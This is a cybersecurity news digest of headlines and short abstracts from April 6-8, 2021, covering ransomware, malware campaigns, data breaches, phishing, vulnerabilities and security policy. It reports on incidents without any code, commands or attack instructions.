April 8, 2021 – Malware
IcedID - A New Threat In Office Attachments Full Text
Abstract
The specific Excel document used in the recent wave of attacks is using XLM macros to download and execute its payload. The latest update also saw a major change in its first stage loading mechanism.Minerva Labs
April 8, 2021 – Attack
Over 200 Bangladesh Organizations Hit by Hafnium Hacker Group Full Text
Abstract
According to a Cyber Threat Report released by the Bangladesh Government’s e-GOV CIRT on April 1st, hacker group Hafnium has launched attacks on more than 200 organizations in Bangladesh.Heimdal Security
April 8, 2021 – Policy and Law
Man arrested after hired a hitman on the dark web Full Text
Abstract
A joint operation of Europol and the Italian Postal and Communication Police resulted in the arrest of an Italian national who hired a hitman on the dark web. Europol and the Italian Postal and Communication Police (Polizia Postale e delle Comunicazioni)...Security Affairs
April 07, 2021 – Breach
PHP Site’s User Database Was Hacked In Recent Source Code Backdoor Attack Full Text
Abstract
The maintainers of the PHP programming language have issued an update regarding the security incident that came to light late last month, stating that the actors may have gotten hold of a user database containing their passwords to make unauthorized changes to the repository. "We no longer believe the git.php.net server has been compromised. However, it is possible that the master.php.net user database leaked," Nikita Popov said in a message posted on its mailing list on April 6. On March 28, unidentified actors used the names of Rasmus Lerdorf and Popov to push malicious commits to the "php-src" repository hosted on the git.php.net server that involved adding a backdoor to the PHP source code in an instance of a software supply chain attack. While this was initially treated as a compromise of the git.php.net server, further investigation into the incident has revealed that the commits were a result of pushing them using HTTPS and password-based authenticatThe Hacker News
April 07, 2021 – General
Hillicon Valley: Twitter will not allow Trump account archive on platform | Commerce Dept. still weighing approach to Huawei, TikTok | Dating apps work to reinvent amid COVID-19 pandemic Full Text
Abstract
Twitter on Wednesday said that it will not allow any of former President TrumpDonald TrumpYelp creates tool to help support Asian-owned businesses Iran espionage-linked ship attacked at sea Biden exceeds expectations on vaccines — so far MORE’s archived tweets while in office on its platform due to the account’s suspension. Meanwhile, Commerce Secretary Gina RaimondoGina RaimondoThe Hill's Morning Report - Biden may find zero GOP support for jobs plan White House hopes to see infrastructure bill passed by summer Biden taps five agency heads to sell infrastructure plan MORE teased next steps around Huawei and TikTok, and dating apps are scrambling to reinvent themselves in the age of COVID-19.The Hill
April 7, 2021 – Hacker
Threat actors targeted Slack and Discord as the pandemic raged on Full Text
Abstract
Collaboration tools that have become more central to how organizations operate since the pandemic are poorly understood by infosec teams and are relatively immature in terms of accompanying security protections provided by third parties.SCMagazine
April 7, 2021 – Ransomware
Ransomware cartel model didn’t fulfill potential, yet, but served as cybercrime proving ground Full Text
Abstract
Competing ransomware actors don’t have enough incentive to collaborate and share profits, but that could change as automated attacks evolve.SCMagazine
April 07, 2021 – Government
Key House leader to press for inclusion of cybersecurity in infrastructure bill Full Text
Abstract
Rep. Yvette Clarke (D-N.Y.), the chair of a key cyber House panel, said Wednesday that she would push for inclusion of language on securing critical systems as part of negotiations around President’s Biden’s infrastructure proposal.The Hill
April 7, 2021 – Ransomware
New Cring ransomware deployed targeting unpatched Fortinet VPN devices Full Text
Abstract
Attackers are actively exploiting the CVE-2018-13379 flaw in Fortinet VPN to deploy the Cring ransomware to organizations in the industrial sector. Threat actors are actively exploiting the CVE-2018-13379 vulnerability in Fortinet VPNs to deploy...Security Affairs
April 07, 2021 – Hacker
VISA: Hackers increasingly using web shells to steal credit cards Full Text
Abstract
Global payments processor VISA warns that threat actors are increasingly deploying web shells on compromised servers to exfiltrate credit card information stolen from online store customers.BleepingComputer
April 07, 2021 - Government
Commerce Dept. still weighing approach to Huawei, TikTok Full Text
Abstract
Commerce Secretary Gina Raimondo said Wednesday that while she intends to aggressively push back against China, reviews are ongoing about how the Biden administration will address Chinese companies Huawei and TikTok.The Hill
April 7, 2021 – Attack
Attackers Blowing Up Discord, Slack with Malware Full Text
Abstract
One Discord network search turned up 20,000 virus results, researchers found.Threatpost
April 07, 2021 – Ransomware
REvil ransomware now changes password to auto-login in Safe Mode Full Text
Abstract
A recent change to the REvil ransomware allows the threat actors to automate file encryption via Safe Mode after changing Windows passwords.BleepingComputer
April 07, 2021 – Vulnerabilities
Cisco fixes bug allowing remote code execution with root privileges Full Text
Abstract
Cisco has released security updates to address a pre-authentication remote code execution (RCE) vulnerability affecting SD-WAN vManage Software's user management function.BleepingComputer
April 7, 2021 – General
Cyberattackers Jamming Productivity of Manufacturing Sector Full Text
Abstract
Manufacturing firms have become a top target of cybercriminals, extortionists, and nation-state groups as a majority of companies continue to experience breaches impacting their factories and taking production offline.Cyware Alerts - Hacker News
April 7, 2021 – Denial Of Service
DDoS Extortion Attacks Get Stronger and More Persistent Full Text
Abstract
Akamai has recently reported three large-scale DDoS attacks. These attacks count among the six biggest volumetric DDoS attacks the company has ever recorded.Cyware Alerts - Hacker News
April 7, 2021 – General
Crossing the Line: When Cyberattacks Become Acts of War Full Text
Abstract
Saryu Nayyar, CEO at Gurucul, discusses the new Cold War and the potential for a cyberattack to prompt military action.Threatpost
April 7, 2021 – General
Krebs: It’s time for a law that invests in the digital infrastructure Full Text
Abstract
The former head of the CISA advocated for the equivalent of block grants to state and local government to modernize IT infrastructure, which in turn would boost citizen services, business growth, jobs, “and yes, help stop ransomware.”SCMagazine
April 07, 2021 – Ransomware
New Cring ransomware hits unpatched Fortinet VPN devices Full Text
Abstract
A vulnerability impacting Fortinet VPNs is being exploited by a new human-operated ransomware strain known as Cring to breach and encrypt industrial sector companies' networks.BleepingComputer
April 7, 2021 – Vulnerabilities
NSA workflow application Emissary vulnerable to malicious takeover Full Text
Abstract
Users have been urged to update their systems after the discovery of five security flaws in the Java web application, which runs in a multi-tiered P2P network of computer resources.The Daily Swig
April 7, 2021 – Breach
Consulting Firm Data Breach Impacts MSU Full Text
Abstract
Michigan State University affected by ransomware attack on contractor’s law firmInfosecurity Magazine
April 7, 2021 – General
IT Pros Share Work Devices with Household Full Text
Abstract
Nearly a quarter of IT security professionals let household members use their work devicesInfosecurity Magazine
April 7, 2021 – Phishing
Crooks use Telegram bots and Google Forms to automate phishing Full Text
Abstract
Cybercriminals often use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites to help keep it safe and start using the information immediately.Security Affairs
April 7, 2021 – Malware
Fake Netflix App on Google Play Spreads Malware Via WhatsApp Full Text
Abstract
The wormable malware spread from Android to Android by sending messages offering free Netflix Premium for 60 days.Threatpost
April 7, 2021 – Vulnerabilities
Hackers Targeting Mission-critical SAP Applications Exploiting known Security Vulnerabilities Full Text
Abstract
Active cyberattacks on known vulnerabilities in SAP systems could lead to full control of unsecured SAP applications, according to a report issued...Cyber Security News
April 07, 2021 – Phishing
Google Forms and Telegram abused to collect phished credentials Full Text
Abstract
Security researchers note an increase in alternative methods to steal data from phishing attacks, as scammers obtain the stolen info through Google Forms or private Telegram bots.BleepingComputer
April 7, 2021 – Vulnerabilities
Vulnerabilities in ICS-specific backup solution open industrial facilities to attack Full Text
Abstract
Researchers from Claroty have found and privately disclosed nine vulnerabilities affecting Rockwell Automation’s FactoryTalk AssetCentre, an ICS-specific backup solution.Help Net Security
April 7, 2021 – Ransomware
Ryuk’s Rampage Has Lessons for the Enterprise Full Text
Abstract
Ryuk was among the first high-touch "human-operated" ransomware campaigns that have become prevalent in recent years, affecting both public and private sector organizations with crippling attacks.Dark Reading
April 7, 2021 – Policy and Law
Chemical Weapon Shopping Sends Dark Web User to Prison Full Text
Abstract
Broken-hearted American locked up for 12 years for trying to buy chemical weapon on dark webInfosecurity Magazine
April 7, 2021 – Malware
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
This supply chain attack took place around April 1, 2021, the ad-injecting malware was delivered to the Android devices of the Germany-based communications technology vendor.Security Affairs
April 07, 2021 – Malware
Gigaset Android phones infected by malware via hacked update server Full Text
Abstract
Owners of Gigaset Android phones have been repeatedly infected with malware since the end of March after threat actors compromised the vendor's update server in a supply-chain attack.BleepingComputer
April 7, 2021 – General
Perpetual Disruption: What is Good Cybersecurity Governance in Health Care? Full Text
Abstract
The appeal of disruptive technologies is that they offer clearly improved ways of doing things. But it also means facing new openings for threat actors, which brings the CISO role into focus.Security Intelligence
April 07, 2021 – Vulnerabilities
Android to Support Rust Programming Language to Prevent Memory Flaws Full Text
Abstract
Google on Tuesday announced that its open source version of the Android operating system will add support for Rust programming language in a bid to prevent memory safety bugs. To that end, the company has been building parts of the Android Open Source Project (AOSP) with Rust for the past 18 months, with plans in the pipeline to scale this initiative to cover more aspects of the operating system. "Managed languages like Java and Kotlin are the best option for Android app development," Google said . "The Android OS uses Java extensively, effectively protecting large portions of the Android platform from memory bugs. Unfortunately, for the lower layers of the OS, Java and Kotlin are not an option." Stating that code written in C and C++ languages requires robust isolation when parsing untrustworthy input, Google said the technique of containing such code within a tightly constrained and unprivileged sandbox can be expensive, causing latency issues and additionalThe Hacker News
April 7, 2021 – Phishing
Phishing Emails Most Commonly Originate from Eastern Europe Full Text
Abstract
The five countries sending the highest proportion of phishing emails are from Eastern EuropeInfosecurity Magazine
April 07, 2021 – Vulnerabilities
Microsoft’s Windows 10, Exchange, and Teams hacked at Pwn2Own Full Text
Abstract
During the first day of Pwn2Own 2021, contestants won $440,000 after successfully exploiting previously unknown vulnerabilities to hack Microsoft's Windows 10 OS, the Exchange mail server, and the Teams communication platform.BleepingComputer
April 7, 2021 – Malware
Aurora campaign: Attacking Azerbaijan using multiple RATs Full Text
Abstract
The malicious document targets the government of Azerbaijan using a SOCAR letter template as a phishing lure. SOCAR is the name of Azerbaijan’s Republic Oil and Gas Company.Malwarebytes Labs
April 7, 2021 – General
Pwn2Own 2021 Day 1 – participants earned more than $500k Full Text
Abstract
The Pwn2Own 2021 hacking competition has begun and white hat hackers participants earned more than $500000 on the first day. The Pwn2Own 2021 has begun, this year the formula for the popular hacking competition sees the distribution of the participants...Security Affairs
April 7, 2021 – Government
IG: Cybersecurity Weaknesses Persist in US Energy Dept. Full Text
Abstract
Cybersecurity weaknesses persist throughout the U.S. DOE's unclassified networks, including those of the National Nuclear Security Administration, according to an inspector general audit.Gov Info Security
April 7, 2021 – Vulnerabilities
Rust in the Android platform Full Text
Abstract
Google announced that the Android Open Source Project (AOSP) now supports the Rust programming language for developing the OS itself to prevent memory safety vulnerabilities.Chrome Releases
April 7, 2021 – General
US DoD Launches Vuln Disclosure Program for Contractor Networks Full Text
Abstract
Running as a pilot, the DIB-VDP covers participating DoD contractor partner’s information systems and web properties, as well as other assets within scope, and is separate from the existing DoD VDP.Security Week
April 7, 2021 – General
How do I select an attack detection solution for my business? Full Text
Abstract
Anuj Goel, CEO, Cyware, says that businesses should look for a solution that brings together siloed security data to boost collaboration in threat response and increases productivity using automation.Help Net Security
April 07, 2021 – Breach
Facebook attributes 533 million users’ data leak to “scraping” not hacking Full Text
Abstract
Facebook has now released a public statement clarifying the cause of and addressing some of the concerns related to the recent data leak. As reported last week, information of about 533 million Facebook profiles surfaced on a hacker forum.BleepingComputer
April 7, 2021 – Insider Threat
Coca-Cola trade secret theft underscores importance of insider threat early detection Full Text
Abstract
A research engineer used basic exfiltration techniques to steal trade secrets from Coca-Cola, but wasn't caught until she attempted to steal similar data from another company.CSO Online
April 07, 2021 – Malware
WhatsApp-based wormable Android malware spotted on the Google Play Store Full Text
Abstract
Cybersecurity researchers have discovered yet another piece of wormable Android malware—but this time downloadable directly from the official Google Play Store—that's capable of propagating via WhatsApp messages. Disguised as a rogue Netflix app under the name of "FlixOnline," the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server. "The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server," Check Point researchers said in an analysis published today. Besides masquerading as a Netflix app, the malicious "FlixOnline" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gain access toThe Hacker News
April 7, 2021 – Privacy
Privacy Concerns Raised Over Scotland’s New #COVID19 Check-In App Full Text
Abstract
Check In Scotland uploads and stores venue check-in data to a centralized databaseInfosecurity Magazine
April 7, 2021 – Phishing
Crooks use Telegram bots and Google Forms to automate phishing Full Text
Abstract
Crooks increasingly often use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites. Group-IB, a global threat hunting and adversary-centric cyber intelligence company, has found that cybercriminals...Security Affairs
April 7, 2021 – Breach
Facebook: Stolen Data Scraped from Platform in 2019 Full Text
Abstract
The flaw that caused the leak of personal data of more than 533 million users over the weekend no longer exists; however, the social media giant still faces an investigation by EU regulators.Threatpost
April 07, 2021 – Malware
Android malware infects wannabe Netflix thieves via WhatsApp Full Text
Abstract
Newly discovered Android malware found on Google's Play Store disguised as a Netflix tool is designed to auto-spread to other devices using WhatsApp auto-replies to incoming messages.BleepingComputer
April 7, 2021 – Breach
Over 1 Million People Affected by Newly Revealed Accellion Health Data Breaches Full Text
Abstract
Months after the December cyberattack on Accellion's File Transfer Appliance, the identities of more healthcare sector entities that were affected continue to come to light.Gov Info Security
April 07, 2021 – Education
11 Useful Security Tips for Securing Your AWS Environment Full Text
Abstract
Want to take advantage of excellent cloud services? Amazon Web Services may be the perfect solution, but don't forget about AWS security. Whether you want to use AWS for a few things or everything, you need to protect access to it. Then you can make sure your business can run smoothly. Read on to learn some important AWS security tips. Use Multi-Factor authentication When setting up your AWS security settings or adding new users, you should implement multi-factor authentication (MFA). MFA relies on more than one login factor to grant you access to your account. For example, when you log in to your account, the program might send a code to your mobile phone. Then you must verify that you have that phone and enter the code to access your account. MFA is an excellent way to protect your data if someone figures out your username and password. This way, you can still have a layer of protection against the hacker. Create strong passwords Even with MFA, you should use strong, uniThe Hacker News
April 7, 2021 – General
Cybersecurity Industry Must Find Solutions for Third Party Data Security Full Text
Abstract
The growing use of third parties has thrown up major data security challengesInfosecurity Magazine
April 7, 2021 – Malware
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
A new supply chain attack made the headlines, threat actors compromised at least one update server of smartphone maker Gigaset to deliver malware. The German device maker Gigaset was the victim of supply chain attack, threat actors compromised at least...Security Affairs
April 7, 2021 – General
One of WFH’s biggest losers: Cybersecurity Full Text
Abstract
Nearly half of businesses say work-from-home policies have hurt their cybersecurity practices, according to Verizon's (VZ) 2021 Mobile Security Index, published on Tuesday.CNN Money
April 7, 2021 – Malware
Wormable Netflix Malware Spreads Via WhatsApp Messages Full Text
Abstract
Check Point says threat is designed to phish for log-ins and card detailsInfosecurity Magazine
April 7, 2021 – APT
APT Group Using Voice Changing Software in Spear-Phishing Campaign Full Text
Abstract
A sub-group of the 'Molerats' threat-actor has been using voice-changing software to successfully trick targets into installing malware, according to a warning from Cado Security.Security Week
April 7, 2021 – Government
CISA: Patch Legacy SAP Vulnerabilities Urgently Full Text
Abstract
Onapsis report claims some exploited bugs date back to 2010Infosecurity Magazine
April 7, 2021 – Phishing
Emerging hacking tool ‘EtterSilent’ mimics DocuSign, researchers find Full Text
Abstract
EtterSilent has been advertised in a Russian cybercrime forum and comes in two versions. One exploits a vulnerability in Microsoft Office, CVE-2017-8570, and one uses a malicious macro.Cyberscoop
April 7, 2021 – Breach
Office Depot Configuration Error Exposes One Million Records Full Text
Abstract
Researchers say Elasticsearch database may have been open for 10 daysInfosecurity Magazine
April 07, 2021 – Vulnerabilities
Critical Auth Bypass Bug Found in VMWare Data Centre Security Product Full Text
Abstract
A critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems. Tracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. Carbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform. "A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication," VMware said in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance. Armed with the access, a malicious actor can then view and alter administrative configuration settings , the company added. In addition to releasing a fix for CVE-2021The Hacker News
April 7, 2021 – Government
EU institutions experienced hack attempt in March: spokesman Full Text
Abstract
The European Commission and other EU institutions were the target of a cyber attack last month, but there has been no evidence so far of any major information breach, a Commission spokesman said.Reuters
April 7, 2021 – Vulnerabilities
Zero-Click Flaw with Apple Mail Can be Triggered by Sending Two Zip Files Full Text
Abstract
Mikko Kenttala, founder and CEO of SensorFu found a zero-click vulnerability in Apple Mail, which allowed to add or modify any arbitrary...Cyber Security News
April 07, 2021 – Malware
Pre-Installed Malware Dropper Found On German Gigaset Android Phones Full Text
Abstract
In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app. "The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui , which is a pre-installed system app," Malwarebytes researcher Nathan Collier said . "This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone." The development was first reported by German author and blogger Günter Born last week. While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+. According to Malwarebytes, the Update app installsThe Hacker News
April 7, 2021 – Government
European Commission and other institutions were hit by a major cyber-attack Full Text
Abstract
Not only the European Commission, but many other organizations of the European Union have been targeted by a cyberattack in March. A European Commission spokesperson confirmed that the European Commission, along with other European Union organizations,...Security Affairs
April 06, 2021 – Malware
Experts uncover a new Banking Trojan targeting Latin American users Full Text
Abstract
Researchers on Tuesday revealed details of a new banking trojan targeting corporate users in Brazil at least since 2019 across various sectors such as engineering, healthcare, retail, manufacturing, finance, transportation, and government. Dubbed " Janeleiro " by Slovak cybersecurity firm ESET, the malware aims to disguise its true intent via lookalike pop-up windows that are designed to resemble the websites of some of the biggest banks in the country, including Itaú Unibanco, Santander, Banco do Brasil, Caixa Econômica Federal, and Banco Bradesco. "These pop-ups contain fake forms, aiming to trick the malware's victims into entering their banking credentials and personal information that the malware captures and exfiltrates to its [command-and-control] servers," ESET researchers Facundo Muñoz and Matías Porolli said in a write-up. This modus operandi is not new to banking trojans. In August 2020, ESET uncovered a Latin American (LATAM) banking trojan callThe Hacker News
April 6, 2021 – Vulnerabilities
Bug allows attackers to hijack Windows time sync software used to track security incidents Full Text
Abstract
Any disruption to Greyware’s Domain Time II could make it virtually impossible to track a security incident – and any sequence of events that are important to the business or regulators.SCMagazine
April 6, 2021 – Phishing
Array of recent phishing schemes use personalized job lures, voice manipulation Full Text
Abstract
Golden Chickens gang looks to infect targets with backdoor trojan, while MoleRats actors use audio tool to perhaps sound like women in vishing messages.SCMagazine
April 06, 2021 – General
Hillicon Valley: Intel heads to resume threats hearing scrapped under Trump | New small business coalition to urge action on antitrust policy | Amazon backs corporate tax hike to pay for infrastructure Full Text
Abstract
The House and Senate Intelligence panels will hold hearings to examine worldwide threats, including those in the cyber and technology spaces, next week after a two-year gap. Meanwhile, a new coalition of independent businesses is targeting Amazon as it pushes for a revamp of federal antitrust policy, and Amazon CEO Jeff BezosJeffrey (Jeff) Preston BezosAmazon union vote count starts this week for Alabama warehouse Amazon tangles with Warren on Twitter Sanders says he isn't 'comfortable' with Twitter's Trump ban MORE is throwing his weight behind raising the corporate tax rate to pay for President BidenJoe BidenJoe Biden's surprising presidency The Hill's Morning Report - Biden, McConnell agree on vaccines, clash over infrastructure Republican battle with MLB intensifies MORE’s infrastructure package.The Hill
April 06, 2021 – Ransomware
Windows XP makes ransomware gangs work harder for their money Full Text
Abstract
A recently created ransomware decryptor illustrates how threat actors have to support Windows XP, even when Microsoft dropped supporting it seven years ago.BleepingComputer
April 6, 2021 – Breach
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof Full Text
Abstract
The leaked files contain information of the LinkedIn users whose data has been allegedly scraped, including their full names, email addresses, phone numbers, workplace information, and more.Cyber News
April 06, 2021 – Disinformation
Facebook removes over 1,100 accounts spreading deceptive content Full Text
Abstract
Facebook on Tuesday announced that during March it removed more than 1,100 accounts tied to spreading deceptive content in a variety of countries as part of its effort to root out domestic and international disinformation efforts.The Hill
April 6, 2021 – Ransomware
Florida School District Held to Impossibly High Ransom Full Text
Abstract
Ransomware operators demand $40m from Broward County Public Schools systemInfosecurity Magazine
April 6, 2021 – Vulnerabilities
SAP systems are targeted within 72 hours after updates are released Full Text
Abstract
On-premises SAP systems are targeted by threat actors within 72 hours after security patches are released, security SAP security firm Onapsis warns. According to a joint study published by Onapsis and SAP, on-premises SAP systems are targeted by threat...Security Affairs
April 6, 2021 – Ransomware
Hackers rush to new doc builder that uses Macro-exploit, posing as DocuSign Full Text
Abstract
It’s use in Trickbot and BazarLoader campaigns puts EtterSilent at the front end of attack chains for two of the most popular ransomware precursors in the world.SCMagazine
April 6, 2021 – Vulnerabilities
Critical Cloud Bug in VMWare Carbon Black Allows Takeover Full Text
Abstract
CVE-2021-21982 affects a platform designed to secure private clouds, and the virtual servers and workloads that they contain.Threatpost
April 06, 2021 – Breach
Have I Been Pwned adds search for leaked Facebook phone numbers Full Text
Abstract
Facebook users can now use the Have I Been Pwned data breach notification site to check if their phone number was exposed in the social site's recent data leak.BleepingComputer
April 6, 2021 – Breach
Third-party security breach compromises data of Singapore job-matching service Full Text
Abstract
Personal details of 30,000 individuals in Singapore may have been illegally accessed, following a security breach that targeted a third-party vendor of a job-matching organization on March 12.ZDNet
April 06, 2021 – Government
Senators call for update on investigations into SolarWinds, Microsoft hacks Full Text
Abstract
Bipartisan leaders of a key Senate panel on Tuesday pressed the Biden administration for more information on its investigation into two recent, massive foreign espionage hacking incidents.The Hill
April 6, 2021 – Vulnerabilities
Parrot Launches Bug Bounty Program Full Text
Abstract
European drone group partners with YesWeHack to launch a Bug Bounty programInfosecurity Magazine
April 6, 2021 – Hacker
Chinese Hackers Selling Intimate Stolen Camera Footage Full Text
Abstract
A massive operation offers access to hacked camera feeds in bedrooms and at hotels.Threatpost
April 06, 2021 – Attack
European Commission, other EU orgs recently hit by cyber-attack Full Text
Abstract
The European Commission and several other European Union organizations were hit by a cyberattack in March according to a European Commission spokesperson.BleepingComputer
April 06, 2021 – Government
Intel heads to resume worldwide threats hearing scrapped under Trump Full Text
Abstract
The House and Senate Intelligence committees will question leaders of five major intelligence and security agencies next week, resuming the annual tradition of a worldwide threats hearing that was abandoned under the Trump administration.The Hill
April 6, 2021 – General
Australia Considers Social Media ID Requirement Full Text
Abstract
Aussies may have to prove who they are to use online dating and social media accountsInfosecurity Magazine
April 06, 2021 – Hacker
Hacker sells $38M worth of gift cards from thousands of shops Full Text
Abstract
A Russian hacker has sold on a top-tier underground forum close to 900,000 gift cards with a total value estimated at $38 million.BleepingComputer
April 06, 2021 – Ransomware
Ransomware hits TU Dublin and National College of Ireland Full Text
Abstract
The National College of Ireland is working on restoring IT services after being hit by a ransomware attack over the weekend that forced the college to take IT systems offline.BleepingComputer
April 6, 2021 – Ransomware
Ransom Gangs Emailing Victim Customers for Leverage - KrebsonSecurity Full Text
Abstract
Ransomware gangs are emailing the victim’s customers and partners directly, warning that their data will be leaked to the dark web unless they can convince the victim firm to pay up.Krebs on Security
April 06, 2021 – Policy and Law
Facebook data leak now under EU data regulator investigation Full Text
Abstract
Ireland's Data Protection Commission (DPC) is investigating a massive data leak concerning a database containing personal information belonging to more than 530 million Facebook users.BleepingComputer
April 6, 2021 – Ransomware
Ransomware Attacks Grew by 485% in 2020 Full Text
Abstract
Report assesses how cyber-criminals have exploited the COVID-19 crisisInfosecurity Magazine
April 06, 2021 – Vulnerabilities
Ongoing attacks are targeting unsecured mission-critical SAP apps Full Text
Abstract
Threat actors are targeting mission-critical SAP enterprise applications unsecured against already patched vulnerabilities, exposing the networks of commercial and government organizations to attacks.BleepingComputer
April 6, 2021 – Phishing
Beware of New “more_eggs” Attack Targets Linkedln Users With Fake Job Offers Full Text
Abstract
Hackers spear-phishing business professionals on LinkedIn with fake job offers and infecting them with malware warns eSentire. eSentire, a...Cyber Security News
April 6, 2021 – Phishing
Healthcare Phishing Incidents Lead to Big Breaches Full Text
Abstract
As healthcare organizations continue to fall victim to phishing incidents, the number of individuals affected by health data breaches involving compromised email accounts continues to rise.Gov Info Security
April 06, 2021 – Vulnerabilities
Watch Out! Mission Critical SAP Applications Are Under Active Attack Full Text
Abstract
Cyber attackers are actively setting their sights on unsecured SAP applications in an attempt to steal information and sabotage critical processes, according to new research. "Observed exploitation could lead in many cases to full control of the unsecured SAP application, bypassing common security and compliance controls, and enabling attackers to steal sensitive information, perform financial fraud or disrupt mission-critical business processes by deploying ransomware or stopping operations," cybersecurity firm Onapsis and SAP said in a joint report published today. The Boston-based company said it detected over 300 successful exploitations out of a total of 1,500 attempts targeting previously known vulnerabilities and insecure configurations specific to SAP systems between mid-2020 to March 2021, with multiple brute-force attempts made by adversaries aimed at high-privilege SAP accounts as well as chaining together several flaws to strike SAP applications. ApplicatioThe Hacker News
April 6, 2021 – Breach
AddSecure Acquires Telia Finland’s Alerta Business Full Text
Abstract
The deal will act as a platform for AddSecure to grow its businessInfosecurity Magazine
April 6, 2021 – APT
Chinese Cycldek APT targets Vietnamese Military and Government in sophisticated attacks Full Text
Abstract
China-linked APT group Cycldek is behind an advanced cyberespionage campaign targeting entities in the government and military sector in Vietnam. China-linked APT group LuckyMouse (aka Cycldek, Goblin Panda, Hellsing, APT 27, and Conimes) is targeting...Security Affairs
April 6, 2021 – Hacker
Hackers actively targeting unsecured SAP installs, DHS, SAP and Onapsis warn Full Text
Abstract
With a base of 400,000 clients, SAP chief information security officer said this of the alert: “We want them to be aware of what could be the art of the possible.”SCMagazine
April 6, 2021 – Ransomware
Conti Gang Demands $40M Ransom from Florida School District Full Text
Abstract
New details of negotiation between attackers and officials from Broward County Public Schools emerge after a ransomware attack early last month.Threatpost
April 06, 2021 – Criminals
EtterSilent maldoc builder used by top cybercriminal gangs Full Text
Abstract
A malicious document builder named EtterSilent is gaining more attention on underground forums, security researchers note. As its popularity increased, the developer kept improving it to avoid detection from security solutions.BleepingComputer
April 6, 2021 – Phishing
How Deliveroo Scared Customers into Believing They Had Been Scammed Full Text
Abstract
Deliveroo’s email has similarities to the scams we see arriving in users’ inboxes every day, purporting to be for expensive orders, that trick unsuspecting recipients to click on links in a panic.Bitdefender
April 06, 2021 – Education
MITRE Madness: A Guide to Weathering the Upcoming Vendor Positioning Storm Full Text
Abstract
April is usually a whirlwind month for the cybersecurity industry as it coincides with the release of the highly regarded and influential MITRE ATT&CK test results. The ATT&CK test measures cybersecurity platforms' abilities to detect and react to emulated, multistep attacks that can be used as a barometer of platform effectiveness. This means that every cybersecurity vendor will be tripping over themselves to push out blog posts, webinars, press releases, and more touting how great their services are and how the results validate their products. The result is a storm of spin and PR that is hard to navigate. An upcoming webinar offered by Cynet ( register here ) aims to help industry participants differentiate the spin from the real information when it comes to MITRE ATT&CK results. The Webinar will be led by renowned cybersecurity researcher and Chief Security Strategist for Cynet, Chris Roberts, and Director of Product Marketing for Cynet, George Tubin. The converThe Hacker News
April 6, 2021 – Ransomware
Sophos Links Mount Locker to Astro Locker Ransomware Full Text
Abstract
Experts suspect branding move to kick-start affiliate programInfosecurity Magazine
April 6, 2021 – General
Four in ten temporary BYOD policies will become permanent Full Text
Abstract
A new report from Verizon also noted that 66% of professionals polled said the term “remote work” would die out within five years.SCMagazine
April 6, 2021 – Malware
New Janeleiro Banking Trojan Strikes Companies, Government Agencies in Brazil Full Text
Abstract
A banking Trojan striking corporate targets across Brazil has been unmasked by researchers. On Tuesday, ESET published an advisory on the malware, which has been in development since 2018.ZDNet
April 6, 2021 – General
What we know about the SolarWinds ‘Sunburst’ exploit, and why it still matters Full Text
Abstract
The Sunburst backdoor gave the APT group access to thousands of SolarWinds customers’ networks, enabling them to explore those networks under the security radars of the organizations’ security teams.Check Point Research
April 6, 2021 – Vulnerabilities
VMware Patches Critical Flaw in Carbon Black Cloud Workload Full Text
Abstract
Tracked as CVE-2021-21982 and featuring a CVSS score of 9.1, the vulnerability could allow attackers to bypass authentication through manipulation of a URL on the interface.Security Week
April 6, 2021 – Phishing
Fake LinkedIn job offers scam spreading More_eggs backdoor Full Text
Abstract
Researchers warn that the More_eggs backdoor can also exfiltrate data from a device putting your social media accounts, emails, browsing history, cryptocurrency wallets at risk of being stolen.Hackread
April 6, 2021 – Government
CISA: Patch These Three Fortinet Bugs Now to Avoid Compromise Full Text
Abstract
Attackers targeting government, commercial and tech firmsInfosecurity Magazine
April 6, 2021 – Privacy
Privacy Concerns Sparked by Rust Programming Language Full Text
Abstract
While Rust has become a very popular language, for the past five years, developers have been concerned by their production builds leaking potentially sensitive debug information, writes Ax Sharma.Heimdal Security
April 6, 2021 – Breach
This service allows checking if your mobile is included in the Facebook leak Full Text
Abstract
Security researcher implemented a service to verify if your mobile number is included in the recent Facebook data leak. Security researcher Yaser Alosefer developed a new tool to help users to determine if their mobile numbers are included within...Security Affairs
April 6, 2021 – General
99% of security pros concerned about their IoT and IIoT security Full Text
Abstract
According to a new survey, 99% of security professionals report challenges with the security of their IoT and IIoT devices, and 95% are concerned about risks associated with these connected devices.Help Net Security
April 6, 2021 – Policy and Law
Admin of DeepDotWeb (DDW) Pleads Guilty for Connecting Internet users with Darknet Marketplaces Full Text
Abstract
Recently, the administrator of DeepDotWeb, Tal Parihar has pleaded guilty, as he received kickbacks for connecting all the customers like the buyers...Cyber Security News
April 6, 2021 – Phishing
LinkedIn Users Targeted by Spear-Phishing Campaign Full Text
Abstract
Golden Chickens group goes gunning for job-seekersInfosecurity Magazine
April 6, 2021 – Phishing
Phishing Trends With PDF Files in 2020: 5 Approaches Attackers Use Full Text
Abstract
To lure users into clicking on embedded links and buttons in phishing PDF files, Unit 42 identified the top five schemes grouped as Fake Captcha, Coupon, Play Button, File Sharing, and E-commerce.Palo Alto Networks
April 6, 2021 – General
